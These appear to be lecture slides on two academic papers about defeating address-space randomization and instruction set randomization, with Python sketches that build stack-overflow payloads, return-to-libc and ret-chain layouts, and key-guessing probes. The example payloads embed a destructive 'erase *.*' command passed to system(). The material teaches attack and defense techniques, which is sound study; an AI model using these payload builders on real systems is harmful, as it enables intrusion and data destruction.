On The Effectiveness of Address-Space Randomization H. Shacham, M. Page, B. Pfaff, E.-J. Goh, N. Modadugu, and D. Boneh Stanford University CCS 2004
Code-Injection Attacks
- Inject malicious executable code (the payload) into the victim process
  - e.g., via attacker-supplied input
- Convince the victim process to execute the payload
  - e.g., leverage a buffer overrun to overwrite the return address
- Attacker acquires complete control of the process and all its privileges

Code-injection Example

Attacker input (bytes in order, with what they encode):
  8D 45 B8                 lea eax,[ebp-48h]
  50                       push eax
  FF 15 BC 82 2F 01        call <system>
  65 72 61 73 65 20        .data "erase "
  2A 2E 2A 20              .data "*.* "
  61 (x24) 61 61 61 61     .data "a" (filler)
  30 FB 1F 00              .data (new return address)

Victim: void main(int argc, char *argv[]) { ... return; }

Stack before the overflow (lower addresses first):
  buf (64 bytes)
  saved EBP (4 bytes)
  saved EIP (4 bytes)
  argv (4 bytes)
  argc (4 bytes)
  bottom of stack (higher addresses)

Stack after the overflow (lower addresses first):
  lea eax,[ebp-48h] / push eax / call <system>
  erase *.*
  argv (4 bytes)
  argc (4 bytes), shown as <addr of erase *.* > once the injected push has run
  bottom of stack (higher addresses)

Defense: W⊕X Pages
- Data Execution Prevention (DEP)
  - disallow pages that are both writable and executable
  - stack is writable but non-executable by default
  - now the default on most Windows and Linux systems
- Counter-attack
  - don't insert any code onto the stack
  - jump directly to existing code (typically libc)
  - called a jump-to-libc (return-to-libc) attack

Return-to-libc Example

Attacker input (bytes in order, with what they encode):
  65 72 61 73 65 20        .data "erase "
  2A 2E 2A 20              .data "*.* "
  61 (x58)                 .data "a" (filler)
  BC 82 2F 01              .data <system>
  61 (x8)                  .data "a" (filler)
  30 FB 1F 00              .data <buf>

Victim: void main(int argc, char *argv[]) { ... return; }

Stack before the overflow (lower addresses first):
  buf (64 bytes)
  saved EBP (4 bytes)
  saved EIP (4 bytes)
  argv (4 bytes)
  argc (4 bytes)
  bottom of stack (higher addresses)

Stack after the overflow (lower addresses first):
  erase *.* aaa...
  addr of <system>
  addr of <buf>

When main returns, control transfers to libc::system(char *cmd), which passes cmd to the shell.

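
As an illustration of the byte layout on the slide above, the input can be assembled field by field. This is only a sketch: the two addresses are the example values printed on the slide, and the names `BUF_SIZE`, `SYSTEM_ADDR`, `BUF_ADDR`, and `build_payload` are made up for this example.

```python
import struct

BUF_SIZE = 64              # size of buf on the slide
SYSTEM_ADDR = 0x012F82BC   # example address of system() from the slide
BUF_ADDR = 0x001FFB30      # example address of buf from the slide


def build_payload() -> bytes:
    """Reproduce the slide's byte sequence, lowest stack address first."""
    command = b"erase *.* "
    # Filler covers the rest of buf plus the 4-byte saved EBP (58 bytes here).
    filler = b"a" * (BUF_SIZE + 4 - len(command))
    payload = command + filler
    payload += struct.pack("<I", SYSTEM_ADDR)  # lands on saved EIP
    payload += b"a" * 8                        # 8 filler bytes, as on the slide
    payload += struct.pack("<I", BUF_ADDR)     # pointer to the command string
    return payload


payload = build_payload()
print(payload.hex(" "))
```

Packing with `"<I"` yields the little-endian byte order seen on the slide (`BC 82 2F 01` and `30 FB 1F 00`).
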
Defense: ASLR
- To return-to-libc, the attacker must
  - know where system() is located in libc
  - possibly know where the stack is located (to pass args)
- Idea: randomize the location of libc at load time
  - Address Space Layout Randomization (ASLR)
- To support dynamic linking, libraries must be relocatable
  - they contain relocations that identify all code pointers
  - the linker chooses the library location and remaps code pointers
- Adjust the linker to choose library base addresses pseudorandomly
- Hard for the attacker to predict binary feature locations
  - ...or so we thought

Weaknesses of ASLR
- Once the attacker finds one feature in libc, they know the locations of ALL features in libc
- Not all 32 bits on a 32-bit system are available
  - very high and very low addresses are not available
  - ultimately, only 16 bits remain
- Re-randomization is not possible with shared address spaces
  - most servers have a parent dispatcher process and child responder processes
  - a child may crash, but the parent continues
- Stack location is revealed by existing stack pointers
  - lots of them floating around (e.g., frame pointers)

Derandomization Attack
Phase 1: Find the location of usleep()
- Repeatedly smash the stack with a guessed entry point of usleep()
  - the argument n is an integer, not a pointer, so it does not require attacker knowledge of the stack location
- Failed probe: crash (connection drops immediately)
- Successful probe: pause (connection pauses for n microseconds, then drops)
- Requires 2^16/2 = 2^15 probes on average
- How long do you think this would take on average?
  - Average time for the attack: 216 seconds

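
The 2^15 figure can be checked with a small simulation. The sketch below assumes the simplest model consistent with the slides: the secret offset is uniform over 2^16 values, it is never re-randomized between probes, and the attacker tries candidates in a fixed order. The function names are hypothetical.

```python
import random

ENTROPY_BITS = 16  # randomized bits left on a 32-bit system, per the slides


def probes_until_hit(rng: random.Random) -> int:
    """Guess offsets 0, 1, 2, ... against one fixed secret offset."""
    secret = rng.randrange(2 ** ENTROPY_BITS)
    # No re-randomization between probes, so probe number secret + 1 succeeds.
    return secret + 1


def average_probes(trials: int = 10_000, seed: int = 0) -> float:
    rng = random.Random(seed)
    return sum(probes_until_hit(rng) for _ in range(trials)) / trials


expected = (2 ** ENTROPY_BITS + 1) / 2  # exact mean for a uniform secret
print(expected)          # 32768.5, i.e. about 2^15
print(average_probes())  # simulated mean, close to the exact one
```

If the reported 216 seconds corresponds to roughly 2^15 probes, that works out to about 6.6 ms per probe.
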
Derandomization Attack
Phase 2: Inject the shell code
- Have the location of system() (all libc offsets follow from the location of usleep()), but not the stack location
  - the stack location is needed to inject a pointer to an injected string arg
- Idea: instead of injecting a pointer to buf directly, compute its location from the stack pointer
  - a ret instruction increases the stack pointer by 4
- How to execute a ret without injecting code onto the stack?
  - Answer: just find the address of a ret in libc!
  - Inject that address onto the stack many times to increase the stack pointer until it reaches a pointer to buf

Derandomization Attack

Stack before the overflow (lower addresses first):
  buf (64 bytes)
  saved EBP (4 bytes)
  saved EIP (4 bytes)
  other args & local vars
  pointer to buf
  bottom of stack (higher addresses)

Stack after the overflow (lower addresses first):
  erase *.*
  smashed (unused EBP)
  address of ret
  address of ret
  address of system
  unused retaddr for system call
  pointer to buf
  bottom of stack (higher addresses)

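
The smashed stack shown above can be laid out programmatically. This is a sketch under stated assumptions: `build_ret_chain` is a hypothetical helper, the addresses in the usage line are placeholders, and the number of `ret` addresses depends on how far above the saved EIP the existing pointer to buf happens to sit.

```python
import struct


def build_ret_chain(command: bytes, buf_size: int, ret_addr: int,
                    system_addr: int, num_rets: int) -> bytes:
    """Return the overflow bytes, lowest stack address first.

    The existing pointer to buf, which sits right after these bytes on the
    stack, is deliberately left untouched so system() finds it as its argument.
    """
    if len(command) > buf_size:
        raise ValueError("command does not fit in buf")
    payload = command.ljust(buf_size, b"a")            # fill buf
    payload += b"a" * 4                                # smashed (unused) EBP
    payload += struct.pack("<I", ret_addr) * num_rets  # each ret pops 4 bytes
    payload += struct.pack("<I", system_addr)          # final return target
    payload += b"a" * 4                                # unused retaddr for system
    return payload


# Placeholder addresses, chosen only to make the layout visible.
chain = build_ret_chain(b"erase *.* ", 64, 0x11111111, 0x22222222, num_rets=2)
print(len(chain))  # 84
```

Each `ret` address consumes one 4-byte stack slot, so `num_rets` controls how far the stack pointer advances before control reaches `system`.
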
Where's the FEEB? The Effectiveness of Instruction Set Randomization Ana Nora Sovarel, David Evans, Nathanael Paul University of Virginia USENIX 2005
Instruction Set Randomization
- Idea: randomize the opcode encodings
  - Secure CPU has a privileged 8-bit KEY register
  - CPU XORs each fetched instruction byte with KEY before interpreting it (decrypting it)
  - OS XORs the entire program text with KEY at load time (encrypting it in memory)
- Better implementation:
  - KEY is a length-n byte sequence
  - CPU XORs the code byte at address i with KEY[i mod n]

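
The XOR scheme above is short enough to sketch directly. The function name `isr_xor` and the 3-byte key are assumptions made for this example, and addresses start at 0 for simplicity.

```python
def isr_xor(data: bytes, key: bytes, base_addr: int = 0) -> bytes:
    """XOR the byte at address base_addr + i with key[(base_addr + i) mod n]."""
    n = len(key)
    return bytes(b ^ key[(base_addr + i) % n] for i, b in enumerate(data))


KEY = bytes([0x5A, 0xC3, 0x17])      # hypothetical key, n = 3
program = bytes.fromhex("8D45B850")  # lea eax,[ebp-48h]; push eax

in_memory = isr_xor(program, KEY)    # what the OS stores at load time
fetched = isr_xor(in_memory, KEY)    # what the CPU interprets after decrypting
# Injected bytes were never encrypted, so the CPU "decrypts" them into noise.
injected = isr_xor(program, KEY)

print(fetched == program)  # True
print(injected.hex(" "))
```

Because XOR is its own inverse, the same function serves as the load-time encryption and the fetch-time decryption.
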
Code-injection Example

Attacker input (bytes in order, with what the ISR CPU decodes them as):
  8D 45 B8                 <random instructions>
  50                       <random instructions>
  FF 15 BC 82 2F 01        <random instructions>
  65 72 61 73 65 20        .data "erase "
  2A 2E 2A 20              .data "*.* "
  61 (x24) 61 61 61 61     .data "a" (filler)
  30 FB 1F 00              .data (new return address)

Victim: int main(int argc, char *argv[]) { ... return 0; }

Stack after the overflow (lower addresses first):
  <random instructions> / <random instructions> / <random instructions>
  erase *.*
  argv (4 bytes)
  argc (4 bytes)
  bottom of stack (higher addresses)

Attacking ISR
- Goal: discover the KEY (or at least some of it)
- Four-phase attack:
  - Phase 1: discover 1 or 2 bytes of the KEY
  - Phase 2: discover 4 bytes of the KEY
  - Phase 3: discover 100 bytes of the KEY
  - Phase 4: inject full-sized malicious payloads

Phase 1: Return-attack

Attacker input (bytes in order, with what they encode):
  XX                       ret? (guess at the encrypted encoding of ret)
  61 (x63) 61 61 61 61     .data "a" (filler)
  30 FB 1F 10              .data (new return address)
  61 (x8)                  .data "a" (filler)
  03 14 DF 01              .data <original return addr>

Victim: int main(int argc, char *argv[]) { ... return 0; }

Stack before the overflow (lower addresses first):
  buf (64 bytes)
  saved EBP (4 bytes)
  saved EIP (4 bytes)
  argv (4 bytes)
  argc (4 bytes)
  bottom of stack (higher addresses)

Stack after the overflow (lower addresses first):
  ret? aaa...
  <original return addr>

If XX decrypts to ret, control goes back to <original return addr> and the server keeps behaving normally; otherwise the process crashes.

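
The guessing loop behind the return-attack can be modeled with a toy oracle. This sketch assumes a single-byte XOR key, uses 0xC3 (the one-byte x86 near `ret`), and ignores the false positives discussed under Technical Issues; `make_victim` and `recover_key_byte` are hypothetical names.

```python
RET_OPCODE = 0xC3  # x86 near return


def make_victim(key_byte: int):
    """Model a server whose CPU XORs every fetched byte with key_byte."""
    def probe(injected_byte: int) -> bool:
        # True means the injected byte decrypted to ret, so the server
        # returned to the original address and behaved normally.
        return (injected_byte ^ key_byte) == RET_OPCODE
    return probe


def recover_key_byte(probe):
    """Try every value for XX; return (key byte, number of probes used)."""
    for attempts, guess in enumerate(range(256), start=1):
        if probe(guess):
            return guess ^ RET_OPCODE, attempts
    raise RuntimeError("no guess decrypted to ret")


key_byte, attempts = recover_key_byte(make_victim(0x5A))
print(hex(key_byte), attempts)
```

A successful guess reveals the key byte directly, because the attacker knows both the injected byte and the opcode it must have decrypted to.
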
Phase 1: Jump-attack

Attacker input (bytes in order, with what they encode):
  XX XX                    loop: jump loop? (guess at the encrypted 2-byte jump-to-self)
  61 (x62) 61 61 61 61     .data "a" (filler)
  30 FB 1F 10              .data (new return address)

Victim: int main(int argc, char *argv[]) { ... return 0; }

Stack before the overflow (lower addresses first):
  buf (64 bytes)
  saved EBP (4 bytes)
  saved EIP (4 bytes)
  argv (4 bytes)
  argc (4 bytes)
  bottom of stack (higher addresses)

Stack after the overflow (lower addresses first):
  loop: jump loop? aa...
  argv (4 bytes)
  argc (4 bytes)
  bottom of stack (higher addresses)

If the guess is right, the server spins in an infinite loop instead of crashing.

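Phase 2: Jump-attack

Attacker input (bytes in order, with what they encode):
  90 90                    nop nop
  XX XX                    loop: jump loop?
  61 (x60) 61 61 61 61     .data "a" (filler)
  30 FB 1F 10              .data (new return address)

Victim: int main(int argc, char *argv[]) { ... return 0; }

Stack after the overflow (lower addresses first):
  nop nop loop: jump loop?
  argv (4 bytes)
  argc (4 bytes)
  bottom of stack (higher addresses)
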
Phase 3: Jump-attack

Attacker input (bytes in order, with what they encode):
  EB 03 14 DF XX           jump <original ret addr?>
  61 (x59) 61 61 61 61     .data "a" (filler)
  30 FB 1F 10              .data (new return address)

Victim: int main(int argc, char *argv[]) { ... return 0; }

Stack after the overflow (lower addresses first):
  jump <original ret addr?> aaa...
  argv (4 bytes)
  argc (4 bytes)
  bottom of stack (higher addresses)

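Phase 3: Jump-attack (next position)

Attacker input (bytes in order, with what they encode):
  90                       nop
  EB 03 14 DF XX           jump <original ret addr?>
  61 (x58) 61 61 61 61     .data "a" (filler)
  30 FB 1F 10              .data (new return address)

Victim: int main(int argc, char *argv[]) { ... return 0; }

Stack after the overflow (lower addresses first):
  nop jump <original ret addr?> aa...
  argv (4 bytes)
  argc (4 bytes)
  bottom of stack (higher addresses)
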
Phase 4: Full-size Payloads
- Learn ~100 bytes of KEY using Phases 1-3
- Goal: construct a payload such that
  - execution of the payload never steps the IP outside the 100-byte window of known KEY bytes
  - the payload can be much larger than 100 bytes
- Solution: inject a virtual machine!
  - main engine of the VM is confined to the 100-byte window
  - VM copies small chunks of the payload into the window
  - the copying process encrypts using the known KEY bytes
  - each chunk returns to the main engine when the next chunk is required

Phase 4: MicroVM

MicroVM code (placed under the known KEY masks):
  start:
      save worm address in ebp
      move stack frame pointer
      WormIP = 0
  read_more_worm:
      copy (and encrypt) worm code
      update WormIP
      save VM registers
      load worm registers
      [22-byte worm execution buffer]
      save worm registers
      load VM registers
      jmp read_more_worm

Payload read by the MicroVM:
  worm code
  other worm data

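
The copy-and-encrypt loop can be simulated to see why a payload larger than the known window still decodes correctly. This sketch makes several simplifying assumptions: register save/restore is omitted, chunks are cut at fixed 22-byte boundaries rather than at instruction boundaries, and all names (`encrypt_chunk`, `cpu_fetch`, `run_microvm`) are hypothetical.

```python
CHUNK = 22  # size of the worm execution buffer on the slide


def encrypt_chunk(chunk: bytes, known_key: bytes, buffer_offset: int) -> bytes:
    """Pre-encrypt a chunk with the key bytes of the addresses it will occupy."""
    return bytes(b ^ known_key[buffer_offset + i] for i, b in enumerate(chunk))


def cpu_fetch(memory: bytes, key: bytes, start: int, length: int) -> bytes:
    """Model the ISR CPU: XOR each fetched byte with the key for its address."""
    return bytes(memory[start + i] ^ key[start + i] for i in range(length))


def run_microvm(worm: bytes, known_key: bytes, buffer_offset: int) -> bytes:
    """Return the bytes the CPU ends up interpreting, chunk by chunk."""
    window = bytearray(len(known_key))  # the region with known key bytes
    executed = bytearray()
    worm_ip = 0
    while worm_ip < len(worm):
        chunk = worm[worm_ip:worm_ip + CHUNK]
        end = buffer_offset + len(chunk)
        window[buffer_offset:end] = encrypt_chunk(chunk, known_key, buffer_offset)
        executed += cpu_fetch(window, known_key, buffer_offset, len(chunk))
        worm_ip += len(chunk)  # update WormIP
    return bytes(executed)


known_key = bytes((7 * i + 3) % 256 for i in range(100))  # made-up 100 key bytes
worm = bytes(range(256))                                  # stand-in 256-byte payload
print(run_microvm(worm, known_key, buffer_offset=60) == worm)  # True
```

Only the 22-byte buffer inside the window is ever executed, so the payload length is independent of how many key bytes the attacker has recovered.
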
Technical Issues
- False positives
  - probabilistic analysis and mitigation strategies (see Section 3 of the paper)
- Payloads that contain null bytes
  - compute them dynamically (e.g., xor eax,eax instead of mov eax,0x00000000)
- ISRs that re-randomize after crashes
  - only an issue when children crash the parent process
  - questionable ISR design choice
  - no easy workaround suggested, though

Experimental Results
- Jump-attack cracked a 100-byte key in ~6 min. on average
- Success rate: 95-100%
- ~9 infinite loops on average

Improving ISR
- Larger instruction encodings
  - RISC: all instructions are 32 bits long
- Better encryption
  - AES instead of XOR (too expensive to be practical)
- Non-uniform remapping of instructions
  - introduce P, a random permutation of 0..255
  - to decrypt byte b at address i, compute (P[b] xor KEY[i])
  - encryption uses the inverse P table
- Why does this defeat the attack?

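
The permutation-based remapping can be sketched as a round trip. The decryption rule is the one on the slide; the encryption rule `P_inv[c xor KEY[i]]` is derived from it here, the key is indexed modulo its length as an assumption, and all names are hypothetical.

```python
import random


def make_tables(rng: random.Random):
    """Build a random permutation P of 0..255 and its inverse."""
    p = list(range(256))
    rng.shuffle(p)
    p_inv = [0] * 256
    for index, value in enumerate(p):
        p_inv[value] = index
    return p, p_inv


def decrypt(stored: bytes, key: bytes, p) -> bytes:
    """Slide's rule: byte b at address i decodes to P[b] xor KEY[i]."""
    return bytes(p[b] ^ key[i % len(key)] for i, b in enumerate(stored))


def encrypt(code: bytes, key: bytes, p_inv) -> bytes:
    """Inverse of decrypt: undo the XOR first, then look up the inverse table."""
    return bytes(p_inv[c ^ key[i % len(key)]] for i, c in enumerate(code))


rng = random.Random(0)
P, P_INV = make_tables(rng)
KEY = bytes(rng.randrange(256) for _ in range(8))  # made-up 8-byte key
code = bytes.fromhex("8D45B850C3")

print(decrypt(encrypt(code, KEY, P_INV), KEY, P) == code)  # True
```

One way to approach the slide's question: with plain XOR, a guess that decodes to a known opcode reveals the key byte directly, whereas here the same observation only constrains P[b] xor KEY[i], with P itself unknown.
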
References
- Shacham, Page, Pfaff, Goh, Modadugu, and Boneh. On the Effectiveness of Address-Space Randomization. Proc. 11th ACM Conf. on Comp. and Comm. Security, 2004.
- Sovarel, Evans, and Paul. Where's the FEEB? The Effectiveness of Instruction Set Randomization. Proc. 14th USENIX Security Symposium, 2005.